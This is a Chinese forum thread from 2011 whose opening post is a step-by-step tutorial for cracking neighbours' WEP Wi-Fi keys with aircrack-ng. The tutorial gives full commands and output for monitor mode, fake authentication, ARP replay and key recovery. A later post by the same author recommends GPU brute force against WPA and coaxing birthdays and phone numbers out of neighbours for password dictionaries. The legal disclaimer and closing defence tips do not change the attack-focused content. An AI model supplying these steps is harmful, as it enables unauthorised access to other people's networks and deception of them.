情潮湿语全文:[经验技巧] 破解WLAN密码(更新WPA)

来源:百度文库 编辑:偶看新闻 时间:2024/05/04 22:44:08
本帖最后由 jiang925 于 2011-9-10 01:25 编辑

原文:http://www.jiang925.com/content/ ... bours-wifi-password <---帮忙进去点点广告哈,哈哈哈哈哈

此乃原创,转载注明出处。

首先声明,嗅探公开频道的信息不违法,对嗅探得信息进行运算也不违法,但是未经同意使用他人WLAN是违法的。对擅自使用本文造成的一切后果,本人不承担一切责任!
不要再说什么邻居没有WEP之类的。本文是以科普目的写的。不是教唆犯罪。

WLAN的加密方式,在非专业级别有三种,1)明文,也就是不加密,2)WEP,和3)WPA/WPA2。如果周围有人还用明文WLAN,那就省事儿了,不用费心破解了。如果周围所有人都在用WPA/WPA2,也省事儿了,破解也破解不了。目前还没有有效破解WPA/WPA2的方法。如果有人用WEP的话,请继续看下去。

准备工具
1.一台带无线网卡的电脑。推荐轻薄笔记本,因为你有可能需要在房子里面走来走去以找信号好的地方。网卡的型号也是有要求的。虽然通过查询型号也能确定是否支持,还是用后面的测试工具方便。
2.一张BackTrack的LiveCD或LiveUSB。下载地址是http://www.backtrack-linux.org/downloads/。制作LiveUSB的教程:http://www.backtrack-linux.org/tutorials/usb-live-install/
3.最好自己搭建一个无线热点来进行训练。注意,本文需要一个有流量的无线网。如果自己搭建无线网,用一台无线上网的电脑连入这个无线网。每隔一会儿开一个网页,或者挂着QQ都行。假定热点的设置如下:
  1. MAC地址:00:11:22:33:44:55
  2. SSID:tbc
  3. 频道:9
复制代码破解过程
首先,用BackTrack开机。开机以后,可以选择使用startx命令打开GUI,或者使用CTRL+ALT+Fx在不同shell下切换。
以下是步骤的简介
  1. 1.打开无线网卡的监听模式
  2. 2.测试无线网卡能否插入数据
  3. 3.进行fake authentication,让AP接受你发的包
  4. 4.打开嗅探工具
  5. 5.发送ARP包让数据获得更快
  6. 6.利用破解工具算出密码
复制代码第一步、打开无线网卡的监听模式
这一步的目的是让无线网卡接收听到的所有数据包。通常情况下,无线网卡只向系统汇报发给你的数据包,而忽略发给别人的数据包。
先将无线网卡关闭:
  1. airmon-ng stop wlan0
复制代码系统回复:
  1. Interface       Chipset         Driver

  3. wlan0           Atheros         madwifi-ng (Stopped)
复制代码然后在第9频道打开监听模式:
  1. airmon-ng start wlan0 9
复制代码系统回复:
  1. Interface       Chipset         Driver

  3. wifi0           Atheros         madwifi-ng
  4. mon0            Atheros         madwifi-ng (monitor mode enabled)
复制代码第二步、测试无线网卡能否插入数据
这一步有两个目的。第一是测试无线网卡是不是被破解软件支持。还有就是测试你的无线网卡发送的数据是否能被被攻击的热点接收到。
运行:
  1. aireplay-ng -9 -e tbc -a 00:11:22:33:44:55  wlan0
复制代码系统回复:
  1. 09:23:35  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 9
  2. 09:23:35  Trying broadcast probe requests...
  3. 09:23:35  Injection is working!
  4. 09:23:37  Found 1 AP

  6. 09:23:37  Trying directed probe requests...
  7. 09:23:37  00:11:22:33:44:55 - channel: 9 - 'tbc'
  8. 09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
  9. 09:23:39  30/30: 100%
复制代码如果第三行没有出现,那么证明你的无线网卡不被破解软件支持。唯一解决办法是更换。如果出现了第三行而最后一行出现非常低的百分比。那么有可能是因为你电脑距离热点太远,换个位置或者换一个无线网。

第三步、打开嗅探工具
在一个独立的命令行里运行:
  1. airodump-ng -c 9 --bssid 00:11:22:33:44:55 -w output wlan0
复制代码如果运行成功,会出现类似下面的输出,里面的#Data是我们得到了多少数据的意思:
  1. CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
  2.                                                                                                               
  3. BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  4.                                                                                                             
  5. 00:11:22:33:44:55   42 100     5240   178307  338   9  54  WEP  WEP         tbc                           
  6.                                                                                                             
  7. BSSID              STATION            PWR  Lost  Packets  Probes                                             
  8.                                                                                                             
  9. 00:11:22:33:44:55  00:0C:C5:33:CA:27   42     0   183782  
复制代码第四步、进行fake authentication,让AP接受你发的包
这一步的目的是跟热点进行一次简单握手。这样热点就会接受你发出来的数据包。
运行:
  1. aireplay-ng -1 0 -e tbc -a 00:11:22:33:44:55 wlan0
复制代码握手成功会得到以下回复:
  1. 18:18:20  Sending Authentication Request
  2. 18:18:20  Authentication successful
  3. 18:18:20  Sending Association Request
  4. 18:18:20  Association successful :-)
复制代码第五步、发送ARP包让数据获得更快
这一步的目的是让无线网发送更多我们关心的数据,以加速破解过程。
运行:
  1. aireplay-ng -3 -b 00:11:22:33:44:55 wlan0
复制代码刚开始会不动几秒,过一会儿会变成类似下面的输出:
  1. Saving ARP requests in replay_arp-0321-191525.cap
  2. You should also start airodump-ng to capture replies.
  3. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
复制代码第六步、利用破解工具算出密码
当我们得到了足够的数据以后,就可以进行破解了。多少数据算是足够数据呢?以我的经验,#Data数字达到三万就可以了。如果计算不成功,可以多等一会儿,等数量再涨一涨再算。
运行:
  1. aircrack-ng -b 00:11:22:33:44:55 output*.cap
复制代码如果成功破解,会出现类似下面的回复:
  1.                                               Aircrack-ng 0.9


  4.                               [00:03:06] Tested 674449 keys (got 96610 IVs)

  6. KB    depth   byte(vote)
  7.   0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  8.   1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  9.   2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  10.   3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

  12.                        KEY FOUND! [ 12:34:56:78:90 ]
  13.       Probability: 100%
复制代码P.S.怎么扫描周围的无线网呢?可以使用另外一款BackTrack自带的软件kismet。在命令行里面输入kismet。这个软件可以告诉你周围每一个无线网的SSID,MAC,频道,加密方式,信号强度等。
P.P.S.讲了这么多怎么破解,然后怎么防呢?防范有多种方法,要综合使用,1)最重要的是使用WPA/WPA2,并且使用一个复杂的密码。其他的只能让破解绕个弯儿,不能从本质解决问题,2)隐藏SSID,3)只允许指定MAC连接。
1

评分人数

    • 流风33: 先赏 评分 + 2
收藏 分享 曾经CPCW最年轻之斑竹。头奖一万元现金 “电脑报第一届APP开发挑战赛”邀你来参加!

jiang925

  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
2F 发表于 2011-9-4 23:40 | 只看该作者 本帖最后由 jiang925 于 2011-9-8 22:48 编辑

再来简单说说WPA/WPA2(WPA和WPA2是几乎一样的,没有本质区别。以下为了省事儿,统称WPA)

WPA目前还没有优于暴力破解的方法。可以利用字典攻击来强化一下,但是字典攻击不一定会一定破解成功。想要提高成功率,还要进行一些社会工程学进攻。去邻居那里了解一些情况,比如说电话号,生日,姓名什么的。如果能套来密码的结构就更好了,比如说是纯数字,几个字母加数字等等。

即使是暴力破解。以当今技术,消费级别的电脑在有限时间内还是可以用暴力破解成功了。近期,俄罗斯某企业成功利用nVidia显卡对暴力破解进行了加速。因为破解WPA密码只需一个握手包,然后在本地进行所有的运算,看看运算结果是否符合握手包应有的特征。只有运算,利用GPU是非常适合的。我大致估算了一下,我的两块GTX460(可怜的i7 920只能当配角)能达到每秒三万个key的速度吧。破解一个八位全小写的密码估计需要一周的时间和几百度电(现在一度电多少钱?)。如果有人想要,我可以写教程出来。曾经CPCW最年轻之斑竹。

TOP

liuxi326
  • 发短消息
  • 加为好友

liuxi326 (齐德龙) 当前离线

UID
1104761 
帖子
727 
主题
19 
精华
积分
97 
评分
106  
数动币
1601  
树叶
4  
阅读权限
30 
在线时间
166 小时 
注册时间
2009-10-2 
最后登录
2011-11-13 

大有可为

积分
97 
数动币
1601  
树叶
4  
3F 发表于 2011-9-5 12:04 | 只看该作者 WEP....很少有见到了。。千万别点!!

TOP

jiang925
  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
4F 发表于 2011-9-5 13:56 | 只看该作者 回复 3# liuxi326


    我曾也以为WEP很少见有。事实会吓你一跳

TOP

a0gege
  • 发短消息
  • 加为好友

a0gege 当前离线

UID
1115623 
帖子
553 
主题
精华
积分
1204 
评分
10  
数动币
536  
树叶
0  
阅读权限
60 
来自
天涯海角 
在线时间
5954 小时 
注册时间
2009-10-21 
最后登录
2011-11-14 

自成一派

积分
1204 
数动币
536  
树叶
0  
5F 发表于 2011-9-5 16:13 | 只看该作者 我们这里多是WPA/WPA2。

TOP

chengday
  • 发短消息
  • 加为好友

chengday (随想) 当前离线

*_*不董*_*但是我会用Google

UID
558507 
帖子
50770 
主题
356 
精华
积分
2100 
评分
835  
数动币
62366  
树叶
1969  
阅读权限
100 
在线时间
4605 小时 
注册时间
2006-10-16 
最后登录
2011-11-17 

小小版主

积分
2100 
数动币
62366  
树叶
1969  

6F 发表于 2011-9-5 16:31 | 只看该作者 如果周围所有人都在用WPA/WPA2,也省事儿了,破解也破解不了←※软件与网络技术版块※→软件与网络技术版块2011年10月优秀会员表彰帖
常用的下载:拒绝Ghost—原版Windows XP Pro SP3 Vol MSDN简体中文版Bt下载序列号MRX3F-47B9T-2487J-KWKMF-RPWBY
简单介绍Win7系统最全的安装法     大闪存变身超强工具盘    雨林木风OneKey Ghost Y6.3
SREng下载及日志扫描方法     我很菜,但是我会用Google

TOP

wxy632818742
  • 发短消息
  • 加为好友

wxy632818742 当前离线

UID
1355955 
帖子
32 
主题
精华
积分
评分
5  
数动币
131  
树叶
0  
阅读权限
15 
在线时间
8 小时 
注册时间
2011-9-4 
最后登录
2011-11-15 

初显锋芒

积分
数动币
131  
树叶
0  
7F 发表于 2011-9-5 19:47 | 只看该作者 强帖,顶一个

TOP

流风33
  • 发短消息
  • 加为好友

流风33 当前离线

无语问苍天,他说:我也没辙

UID
10352 
帖子
38629 
主题
127 
精华
积分
1869 
评分
600  
数动币
23268  
树叶
2476  
阅读权限
100 
来自
福建 
在线时间
4825 小时 
注册时间
2004-2-19 
最后登录
2011-11-17 

小小版主

积分
1869 
数动币
23268  
树叶
2476  

8F 发表于 2011-9-5 20:24 | 只看该作者 留的楼呢提醒:如果您的问题得到解决,请编辑原帖修改分类为“[已解决]”  在线多引擎查毒
病毒安全常见问题汇总 SREng下载及日志扫描方法(我就是红色链接)

TOP

lky0529
  • 发短消息
  • 加为好友

lky0529 当前离线

UID
1005260 
帖子
3208 
主题
精华
积分
597 
评分
440  
数动币
8058  
树叶
189  
阅读权限
50 
在线时间
1645 小时 
注册时间
2009-1-20 
最后登录
2011-11-14 

功成名就

积分
597 
数动币
8058  
树叶
189  

9F 发表于 2011-9-5 21:33 | 只看该作者 WEP的是有,但懒得去破了,免费的wifi不少

TOP

liuxi326
  • 发短消息
  • 加为好友

liuxi326 (齐德龙) 当前离线

UID
1104761 
帖子
727 
主题
19 
精华
积分
97 
评分
106  
数动币
1601  
树叶
4  
阅读权限
30 
在线时间
166 小时 
注册时间
2009-10-2 
最后登录
2011-11-13 

大有可为

积分
97 
数动币
1601  
树叶
4  
10F 发表于 2011-9-5 23:02 | 只看该作者 回复 4# jiang925


    我很期待。。

TOP

Dolphinsimon
  • 发短消息
  • MSN 聊天
  • 加为好友

Dolphinsimon (德尔菲斯) 当前离线

苦逼程序猿

UID
1250136 
帖子
2304 
主题
19 
精华
积分
238 
评分
256  
数动币
5685  
树叶
38  
阅读权限
50 
来自
江苏徐州 
在线时间
379 小时 
注册时间
2010-6-22 
最后登录
2011-11-16 

病毒·反毒精英

积分
238 
数动币
5685  
树叶
38  

11F 发表于 2011-9-6 12:32 | 只看该作者 叶子要是来了可以和你交流交流···求关注!!!!

TOP

yszzf
  • 发短消息
  • MSN 聊天
  • 加为好友

yszzf 当前离线

UID
939966 
帖子
5530 
主题
54 
精华
积分
432 
评分
472  
数动币
8245  
树叶
199  
阅读权限
80 
来自
江苏常熟 
在线时间
489 小时 
注册时间
2008-7-11 
最后登录
2011-11-13 

系统·四魂领主

积分
432 
数动币
8245  
树叶
199  

12F 发表于 2011-9-6 18:21 | 只看该作者 回复 11# Dolphinsimon


    不交流
这种事情怎么能交流呢?
话说求LZ的博客是给老外看的?

其实aircrack-ng可以安装在所有Linux上的
还有,现在beini好一点

TOP

笨笨的小懒猫
  • 发短消息
  • 加为好友

笨笨的小懒猫 (笨猫) 当前离线

珍惜生命 远离电脑

UID
516742 
帖子
18308 
主题
70 
精华
积分
966 
评分
369  
数动币
28676  
树叶
2641  
阅读权限
150 
在线时间
2536 小时 
注册时间
2006-8-23 
最后登录
2011-11-16 

分区版主

积分
966 
数动币
28676  
树叶
2641  

13F 发表于 2011-9-6 20:44 | 只看该作者 其实看到这贴就首先想到了小油条和小叶子童鞋
SREng下载及日志扫描方法                  
如何修复被劫持、篡改的IE主页

TOP

jiang925
  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
14F 发表于 2011-9-6 21:19 | 只看该作者 本帖最后由 jiang925 于 2011-9-6 21:21 编辑

回复 12# yszzf


    1.我在国外混的。
2.aircrack-ng不是那么容易成功运行的。比如说ubuntu这样为了方便用户把什么事情都代劳的distro,打过补丁的网卡驱动怎么也装不上。至少我没成功装上。
3.不介意介绍一下beini的优点?我看了个教程,看着跟aircrack同出一辙。

TOP

jiang925
  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
15F 发表于 2011-9-6 21:20 | 只看该作者 回复 13# 笨笨的小懒猫


    又看到了青年才俊,我想起了我编程版以前的xpycc。

TOP

笨笨的小懒猫
  • 发短消息
  • 加为好友

笨笨的小懒猫 (笨猫) 当前离线

珍惜生命 远离电脑

UID
516742 
帖子
18308 
主题
70 
精华
积分
966 
评分
369  
数动币
28676  
树叶
2641  
阅读权限
150 
在线时间
2536 小时 
注册时间
2006-8-23 
最后登录
2011-11-16 

分区版主

积分
966 
数动币
28676  
树叶
2641  

16F 发表于 2011-9-6 21:28 | 只看该作者 回复 15# jiang925

真是长江后浪推前浪呀

人家小叶子童鞋才初二呢

叫我们情何以堪呀

TOP

jiang925
  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
17F 发表于 2011-9-6 21:33 | 只看该作者 回复 16# 笨笨的小懒猫


    是啊。想当年我初二的时候也没这么厉害。前途无量

TOP

笨笨的小懒猫
  • 发短消息
  • 加为好友

笨笨的小懒猫 (笨猫) 当前离线

珍惜生命 远离电脑

UID
516742 
帖子
18308 
主题
70 
精华
积分
966 
评分
369  
数动币
28676  
树叶
2641  
阅读权限
150 
在线时间
2536 小时 
注册时间
2006-8-23 
最后登录
2011-11-16 

分区版主

积分
966 
数动币
28676  
树叶
2641  

18F 发表于 2011-9-6 21:41 | 只看该作者 回复 17# jiang925

没记错的话你以前是在编程区当版主吧,好久没看到你了

TOP

jiang925
  • 发短消息
  • 加为好友

jiang925 (梦翔 | 我不懂C++) 当前离线

其实我是编程魔方斑竹……

UID
590835 
帖子
4243 
主题
26 
精华
积分
559 
评分
252  
数动币
8987  
树叶
49  
阅读权限
80 
在线时间
1696 小时 
注册时间
2006-12-4 
最后登录
2011-11-17 

VIP

积分
559 
数动币
8987  
树叶
49  
19F 发表于 2011-9-6 21:54 | 只看该作者 回复 18# 笨笨的小懒猫


    当累了就不当了。搞活动都没人来。

TOP

笨笨的小懒猫
  • 发短消息
  • 加为好友

笨笨的小懒猫 (笨猫) 当前离线

珍惜生命 远离电脑

UID
516742 
帖子
18308 
主题
70 
精华
积分
966 
评分
369  
数动币
28676  
树叶
2641  
阅读权限
150 
在线时间
2536 小时 
注册时间
2006-8-23 
最后登录
2011-11-16 

分区版主

积分
966 
数动币
28676  
树叶
2641  

20F 发表于 2011-9-6 21:55 | 只看该作者 回复 19# jiang925


现在没事的时候可以来转转哦, 没有职责也就没有责任了,只当是来轻松哈嘛
破解密码有经验的朋友进来看一下。 做生意的技巧 经验? 怎样reset 无线WLAN AP WLB-2000(AP 驱动)密码? 关于游戏机破解技巧 破解密码 密码破解 密码破解?? 破解密码 破解密码 破解密码 破解密码 破解密码 破解密码 破解密码 破解密码 破解密码 破解密码 密码破解 密码破解 密码破解 密码破解 密码破解 WP是什么意思? 求教设置技巧密码&